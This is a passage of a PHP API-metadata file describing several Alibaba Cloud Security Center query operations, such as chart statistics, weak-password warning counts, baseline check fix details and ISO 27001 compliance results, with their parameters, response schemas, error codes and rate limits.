'E90DE229-9FC6-58F6-BF4B-03AD6179****', 'type' => 'string', 'title' => ''], ], 'type' => 'object', 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'DescribeCanTrySas', 'summary' => 'Checks the permissions on the trial use of Security Center.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCanTrySas'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCanTrySas', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CanTry\\": 0,\\n \\"RequestId\\": \\"E90DE229-9FC6-58F6-BF4B-03AD6179****\\"\\n}","type":"json"}]', ], 'DescribeChartData' => [ 'summary' => 'Queries the statistics of charts configured in a security report.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '157308', 'abilityTreeNodes' => ['FEATUREsasAT4UY0'], ], 'parameters' => [ [ 'name' => 'CharId', 'in' => 'query', 'schema' => ['description' => 'The chart ID.'."\n" ."\n" .'> Call the [DescribeChartList](~~DescribeChartList~~) operation to obtain this parameter. This parameter is required if the report version is 1.0.0.', 'type' => 'string', 'required' => false, 'example' => 'CID_ASSET_RISK_TREND', 'title' => ''], ], [ 'name' => 'TimeStart', 'in' => 'query', 'schema' => ['description' => 'The start timestamp for statistics. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1683603086000', 'title' => ''], ], [ 'name' => 'TimeEnd', 'in' => 'query', 'schema' => ['description' => 'The end timestamp for statistics. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1683862286000', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ReportId', 'in' => 'query', 'schema' => ['description' => 'The report ID.'."\n" ."\n" .'> Call the [DescribeCustomizeReportList](~~DescribeCustomizeReportList~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '721734', 'title' => ''], ], [ 'name' => 'ChartId', 'in' => 'query', 'schema' => ['description' => 'The chart ID.'."\n" ."\n" .'> Call the [DescribeChartList](~~DescribeChartList~~) operation to obtain this parameter. This parameter is required if the report version is 2.0.0.', 'type' => 'string', 'required' => false, 'example' => 'CID_VUL_SUMMARY', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'PropertyValue' => ['description' => 'The property value in the chart.', 'type' => 'string', 'example' => '{\'totalCount\': \'0\'}', 'title' => ''], 'ProperyArrayValue' => ['description' => 'The property array of the chart.', 'type' => 'string', 'example' => '[]', 'title' => ''], 'ChartType' => ['description' => 'The chart type. Valid values:'."\n" .'- **timeLine**: timeline chart'."\n" .'- **timeBar**: time-axis bar chart'."\n" .'- **bar**: bar chart'."\n" .'- **line**: line chart'."\n" .'- **pie**: pie chart'."\n" .'- **gauge**: gauge chart'."\n" .'- **table**: table'."\n" .'- **text**: text.', 'type' => 'string', 'example' => 'timeBar', 'title' => ''], 'ChartDataType' => ['description' => 'The chart data type. Valid values:'."\n" .'- **commonCoordinate**: common coordinate'."\n" .'- **timeCoordinate**: time-axis coordinate'."\n" .'- **multipleValue**: multiple values'."\n" .'- **singleValue**: single value'."\n" .'- **propertyValue**: property value'."\n" .'- **propertyArrayValue**: array property value.', 'type' => 'string', 'example' => 'propertyArrayValue', 'title' => ''], 'CoordinateData' => [ 'description' => 'The coordinate data.', 'type' => 'object', 'properties' => [ 'YAxisList' => [ 'description' => 'The list of Y-axis values.', 'type' => 'array', 'items' => [ 'description' => 'The Y-axis value.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The data type.', 'type' => 'string', 'example' => 'high', 'title' => ''], 'Name' => ['description' => 'The data type name.', 'type' => 'string', 'example' => 'Port', 'title' => ''], 'Value' => [ 'description' => 'The Y-axis values corresponding to each X-axis point.', 'type' => 'array', 'items' => ['description' => 'The Y-axis value corresponding to an X-axis point.', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], 'title' => '', 'example' => '', ], 'SubType' => ['description' => 'The chart subtype data.', 'type' => 'string', 'example' => 'CID_SUSPICIOUS_TREND-AL', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'XAxis' => [ 'description' => 'The list of X-axis values.', 'type' => 'array', 'items' => ['description' => 'The X-axis value.', 'type' => 'string', 'example' => '2024-01-01', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'SingleData' => [ 'description' => 'The single-value chart data.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The data type.', 'type' => 'string', 'example' => 'suspicious', 'title' => ''], 'Value' => ['description' => 'The data value of the single-value chart.', 'type' => 'integer', 'format' => 'int64', 'example' => '172', 'title' => ''], 'Name' => ['description' => 'The data type name.', 'type' => 'string', 'example' => 'suspicious', 'title' => ''], ], 'title' => '', 'example' => '', ], 'MultipleData' => [ 'description' => 'The multiple-value chart data.', 'type' => 'array', 'items' => [ 'description' => 'The multiple-value chart.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The data type.', 'type' => 'string', 'example' => 'safe', 'title' => ''], 'Value' => ['description' => 'The property value.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Color' => ['description' => 'The font color in RGBA hexadecimal color code.', 'type' => 'string', 'example' => '#FFA800', 'title' => ''], 'Name' => ['description' => 'The data type name.', 'type' => 'string', 'example' => 'Safety', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '50CCE62A-2BC4-5CF8-B976-E4F62A31****', 'title' => ''], 'ChartSubTypeList' => [ 'description' => 'The list of selected chart subtype values.', 'type' => 'array', 'items' => ['description' => 'The selected chart subtype value.', 'type' => 'string', 'example' => '["CID_VUL_TREND-CVE", "CID_VUL_TREND-SYS", "CID_VUL_TREND-CMS", "CID_VUL_TREND-APP", "CID_VUL_TREND-EMG"]', 'title' => ''], 'title' => '', 'example' => '', ], 'AllChartSubTypeList' => [ 'description' => 'The available values for all subtypes of the chart.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'SubType' => ['description' => 'The chart subtype.', 'type' => 'string', 'example' => 'CID_SUSPICIOUS_TREND-ALL', 'title' => ''], 'SubTypeName' => ['description' => 'The chart subtype name.', 'type' => 'string', 'example' => 'All Alerts', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PropertyArrayValue' => ['description' => 'The array chart property values.', 'type' => 'string', 'example' => '[]', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query security daily report chart statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '35', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeChartData'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:DescribeChartData', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"PropertyValue\\": \\"{\'totalCount\': \'0\'}\\",\\n \\"ProperyArrayValue\\": \\"[]\\",\\n \\"ChartType\\": \\"timeBar\\",\\n \\"ChartDataType\\": \\"propertyArrayValue\\",\\n \\"CoordinateData\\": {\\n \\"YAxisList\\": [\\n {\\n \\"Type\\": \\"high\\",\\n \\"Name\\": \\"Port\\",\\n \\"Value\\": [\\n \\"1\\"\\n ],\\n \\"SubType\\": \\"CID_SUSPICIOUS_TREND-AL\\"\\n }\\n ],\\n \\"XAxis\\": [\\n \\"2024-01-01\\"\\n ]\\n },\\n \\"SingleData\\": {\\n \\"Type\\": \\"suspicious\\",\\n \\"Value\\": 172,\\n \\"Name\\": \\"suspicious\\"\\n },\\n \\"MultipleData\\": [\\n {\\n \\"Type\\": \\"safe\\",\\n \\"Value\\": 0,\\n \\"Color\\": \\"#FFA800\\",\\n \\"Name\\": \\"Safety\\"\\n }\\n ],\\n \\"RequestId\\": \\"50CCE62A-2BC4-5CF8-B976-E4F62A31****\\",\\n \\"ChartSubTypeList\\": [\\n \\"[\\\\\\"CID_VUL_TREND-CVE\\\\\\", \\\\\\"CID_VUL_TREND-SYS\\\\\\", \\\\\\"CID_VUL_TREND-CMS\\\\\\", \\\\\\"CID_VUL_TREND-APP\\\\\\", \\\\\\"CID_VUL_TREND-EMG\\\\\\"]\\"\\n ],\\n \\"AllChartSubTypeList\\": [\\n {\\n \\"SubType\\": \\"CID_SUSPICIOUS_TREND-ALL\\",\\n \\"SubTypeName\\": \\"All Alerts\\"\\n }\\n ],\\n \\"PropertyArrayValue\\": \\"[]\\"\\n}","type":"json"}]', ], 'DescribeChartList' => [ 'summary' => 'Queries the charts supported for statistics in Security Center security reports.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '157307', 'abilityTreeNodes' => ['FEATUREsasAT4UY0'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ProjectCode', 'in' => 'query', 'schema' => ['description' => 'The project code. Valid values:'."\n" ."\n" .'- **customize_report**: custom report.', 'type' => 'string', 'required' => true, 'example' => 'customize_report', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ReportId', 'in' => 'query', 'schema' => ['description' => 'The report ID.'."\n" ."\n" .'> Call the [DescribeCustomizeReportList](~~DescribeCustomizeReportList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '720549', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'ChartList' => [ 'description' => 'The list of charts.', 'type' => 'array', 'items' => [ 'description' => 'The chart data.', 'type' => 'object', 'properties' => [ 'ChartId' => ['description' => 'The chart ID.', 'type' => 'string', 'example' => 'CID_CLOUD_ASSET_SUMMARY', 'title' => ''], 'ChartName' => ['description' => 'The chart name.', 'type' => 'string', 'example' => 'Security Score', 'title' => ''], 'BusinessName' => ['description' => 'The business type name. Valid values:'."\n" ."\n" .'- Overall operation metrics'."\n" .'- Asset operation metrics'."\n" .'- Security alert operation metrics'."\n" .'- Vulnerability operation metrics'."\n" .'- Baseline operation metrics'."\n" .'- Cloud service operation metrics'."\n" .'- Cloud honeypot operation metrics.', 'type' => 'string', 'example' => 'Overall Operation Metrics', 'title' => ''], 'BusinessType' => ['description' => 'The business type. Valid values:'."\n" ."\n" .'- INDEX_SECURITY_OVERALL_OPERATION'."\n" .'- INDEX_ASSET_OPERATION'."\n" .'- INDEX_SUSPICIOUS_OPERATION'."\n" .'- INDEX_VUL_OPERATION'."\n" .'- INDEX_BASELINE_CHECK_OPERATION'."\n" .'- INDEX_CLOUD_ASSET_OPERATION'."\n" .'- INDEX_HONEYPOT_RISK_OPERATION.', 'type' => 'string', 'example' => 'INDEX_SECURITY_OVERALL_OPERATION', 'title' => ''], 'ChartType' => ['description' => 'The chart type. Valid values:'."\n" ."\n" .'- **text**: text'."\n" .'- **table**: table'."\n" .'- **gauge**: gauge chart'."\n" .'- **pie**: pie chart'."\n" .'- **line**: line chart'."\n" .'- **bar**: bar chart'."\n" .'- **timeBar**: timeline bar chart'."\n" .'- **timeLine**: timeline line chart.', 'type' => 'string', 'example' => 'text', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '35B434CC-1615-5937-A04E-A9BC2868DB45', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query statistical chart list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeChartList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeChartList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ChartList\\": [\\n {\\n \\"ChartId\\": \\"CID_CLOUD_ASSET_SUMMARY\\",\\n \\"ChartName\\": \\"Security Score\\",\\n \\"BusinessName\\": \\"Overall Operation Metrics\\",\\n \\"BusinessType\\": \\"INDEX_SECURITY_OVERALL_OPERATION\\",\\n \\"ChartType\\": \\"text\\"\\n }\\n ],\\n \\"RequestId\\": \\"35B434CC-1615-5937-A04E-A9BC2868DB45\\"\\n}","type":"json"}]', ], 'DescribeCheckEcsWarnings' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.3.4', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'SasVersion' => ['description' => 'The edition of Security Center that you purchased. Valid values:'."\n" ."\n" .'- **1**: Free Edition'."\n" .'- **2** or **3**: Enterprise Edition '."\n" .'- **5**: Premium Edition '."\n" .'- **6**: Anti-virus Edition'."\n" ."\n" .'> Both 2 and 3 correspond to Enterprise Edition. There is no difference between the two values.', 'type' => 'string', 'example' => '3', 'title' => ''], 'CanTry' => ['description' => 'Indicates whether the current Security Center edition is a trial version. Valid values:'."\n" .'- **0**: not a trial version'."\n" .'- **1**: a trial version.', 'type' => 'string', 'example' => '0', 'title' => ''], 'WeakPasswordCount' => ['description' => 'The number of high-risk weak password risks detected in your assets.', 'type' => 'string', 'example' => '3', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '4E5BFDCF-B9DD-430D-9DA4-151BCB581C9D', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the number of high-risk weak password risks', 'summary' => 'Queries the number of high-risk weak password risks that exist in your assets.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckEcsWarnings'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCheckEcsWarnings', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"SasVersion\\": \\"3\\",\\n \\"CanTry\\": \\"0\\",\\n \\"WeakPasswordCount\\": \\"3\\",\\n \\"RequestId\\": \\"4E5BFDCF-B9DD-430D-9DA4-151BCB581C9D\\"\\n}","type":"json"}]', ], 'DescribeCheckFixDetails' => [ 'summary' => 'Queries the configurable parameters for fixing a specified check item.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'RiskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline.'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~116179~~) operation to obtain the baseline ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '51', 'title' => ''], ], [ 'name' => 'CheckIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [DescribeRiskType](~~DescribeRiskType~~) operation to obtain the check item ID.', 'type' => 'string', 'required' => false, 'example' => '58', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The result of the check item fix parameter list.', 'type' => 'object', 'properties' => [ 'CheckFixDetails' => [ 'description' => 'The list of check item fix parameters.', 'type' => 'array', 'items' => [ 'description' => 'The check item fix parameter.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '58', 'title' => ''], 'CheckItem' => ['description' => 'The description of the check item.', 'type' => 'string', 'example' => 'Ensure password reuse is limited', 'title' => ''], 'CheckDesc' => ['description' => 'The detailed description of the check item.', 'type' => 'string', 'example' => 'Force users not to reuse recently used passwords to reduce the risk of password guessing attacks', 'title' => ''], 'Rules' => [ 'description' => 'The list of rules supported by the check item.', 'type' => 'array', 'items' => [ 'description' => 'The rule supported by the check item.', 'type' => 'object', 'properties' => [ 'RuleId' => ['description' => 'The rule ID.', 'type' => 'string', 'example' => 'pwd_reuse.system_auth', 'title' => ''], 'RuleDesc' => ['description' => 'The description of the rule.', 'type' => 'string', 'example' => '(/etc/system-auth)Force users not to reuse the number of recently used passwords between 5 and 24', 'title' => ''], 'VarName' => ['description' => 'The variable name.', 'type' => 'string', 'example' => 'open', 'title' => ''], 'DefaultValue' => ['description' => 'The default value of the rule.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Optional' => ['description' => 'Indicates whether the rule is optional. Valid values:'."\n" ."\n" .'- **1**: yes'."\n" .'- **0**: no.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '58', 'title' => ''], 'Value' => ['description' => 'The configured value of the rule parameter.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'ParamList' => [ 'description' => 'The list of rule parameters.', 'type' => 'array', 'items' => [ 'description' => 'The rule parameter information.', 'type' => 'object', 'properties' => [ 'ParamName' => ['description' => 'The name of the rule parameter.', 'type' => 'string', 'example' => 'range_val', 'title' => ''], 'ParamDesc' => ['description' => 'The description of the rule parameter.', 'type' => 'string', 'example' => 'The setting value is 0 means no definition, 1 means success, 2 means failure, 3 means success and failure', 'title' => ''], 'ParamDefaultValue' => ['description' => 'The default value of the rule parameter.', 'type' => 'string', 'example' => '5', 'title' => ''], 'ParamType' => ['description' => 'The type of the rule parameter. Valid values:'."\n" ."\n" .'- **1**: input'."\n" .'- **2**: selection.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'MinValue' => ['description' => 'The minimum value of the rule parameter.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'MaxValue' => ['description' => 'The maximum value of the rule parameter.', 'type' => 'integer', 'format' => 'int32', 'example' => '24', 'title' => ''], 'EnumValue' => ['description' => 'The options of the rule parameter when the parameter type is selection.', 'type' => 'string', 'example' => '0,1,2,3', 'title' => ''], 'Value' => ['description' => 'The configured value of the rule parameter.', 'type' => 'string', 'example' => '18', 'title' => ''], 'RuleId' => ['description' => 'The rule ID.', 'type' => 'string', 'example' => 'pwd_reuse.system_auth', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of check items that support fixing.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '0DBF1E27-98D8-5EC2-9CF3-4A2E26F6****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query check item fix details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckFixDetails'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCheckFixDetails', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CheckFixDetails\\": [\\n {\\n \\"CheckId\\": 58,\\n \\"CheckItem\\": \\"Ensure password reuse is limited\\",\\n \\"CheckDesc\\": \\"Force users not to reuse recently used passwords to reduce the risk of password guessing attacks\\",\\n \\"Rules\\": [\\n {\\n \\"RuleId\\": \\"pwd_reuse.system_auth\\",\\n \\"RuleDesc\\": \\"(/etc/system-auth)Force users not to reuse the number of recently used passwords between 5 and 24\\",\\n \\"VarName\\": \\"open\\",\\n \\"DefaultValue\\": 1,\\n \\"Optional\\": 1,\\n \\"CheckId\\": 58,\\n \\"Value\\": 5,\\n \\"ParamList\\": [\\n {\\n \\"ParamName\\": \\"range_val\\",\\n \\"ParamDesc\\": \\"The setting value is 0 means no definition, 1 means success, 2 means failure, 3 means success and failure\\",\\n \\"ParamDefaultValue\\": \\"5\\",\\n \\"ParamType\\": 1,\\n \\"MinValue\\": 5,\\n \\"MaxValue\\": 24,\\n \\"EnumValue\\": \\"0,1,2,3\\",\\n \\"Value\\": \\"18\\",\\n \\"RuleId\\": \\"pwd_reuse.system_auth\\"\\n }\\n ]\\n }\\n ]\\n }\\n ],\\n \\"Count\\": 20,\\n \\"RequestId\\": \\"0DBF1E27-98D8-5EC2-9CF3-4A2E26F6****\\"\\n}","type":"json"}]', ], 'DescribeCheckResult' => [ 'summary' => 'Queries the result of the ISO 27001 compliance check.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '215977', 'abilityTreeNodes' => ['FEATUREsas312EAH'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult>', 'description' => 'PlainResult\\>'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '571B2642-BF51-5BDD-906B-D2340DB9****', 'title' => ''], 'CheckResultList' => [ 'description' => 'The check results.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The check result.'."\n", 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the corresponding section. Valid values:'."\n" ."\n" .'* **information_classification**: information classification'."\n" .'* **information_mark**: information labeling'."\n" .'* **network_security_policy**: access to networks and network services'."\n" .'* **login_control**: secure logon procedures'."\n" .'* **week_password**: password management system'."\n" .'* **key_manage**: key management'."\n" .'* **malicious_software**: protection against malware'."\n" .'* **information_backup**: information backup'."\n" .'* **audit_policy**: information system audit control mechanisms'."\n", 'type' => 'string', 'example' => 'information_mark', 'title' => ''], 'ComplianceStatus' => ['description' => 'The compliance status. Valid values:'."\n" ."\n" .'* **1**: compliant'."\n" .'* **0**: non-compliant'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IConListError', 'errorMessage' => 'Get Icon List Error, please try again', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ['errorCode' => 'Sign is invalid', 'errorMessage' => 'Signature verification did not pass.', 'description' => 'Signature verification did not pass.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'DescribeCheckResult', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCheckResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"571B2642-BF51-5BDD-906B-D2340DB9****\\",\\n \\"CheckResultList\\": [\\n {\\n \\"Name\\": \\"information_mark\\",\\n \\"ComplianceStatus\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCheckWarningCount' => [ 'summary' => 'Queries the number of alerts that are triggered by a check item.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '144220', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'RiskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the risk item.'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~DescribeCheckWarningSummary~~) operation to query the IDs of risk items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '43', 'title' => ''], ], [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckItemWarningSummary](~~ListCheckItemWarningSummary~~) operation to query the IDs of check items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '926', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the check item. Valid values:'."\n" ."\n" .'* **1**: failed'."\n" .'* **2**: verifying'."\n" .'* **3**: passed'."\n" .'* **6**: ignored'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '3', 'title' => ''], ], [ 'name' => 'AliUid', 'in' => 'query', 'schema' => ['description' => 'The ID of the Alibaba Cloud account.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '103784262032****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => 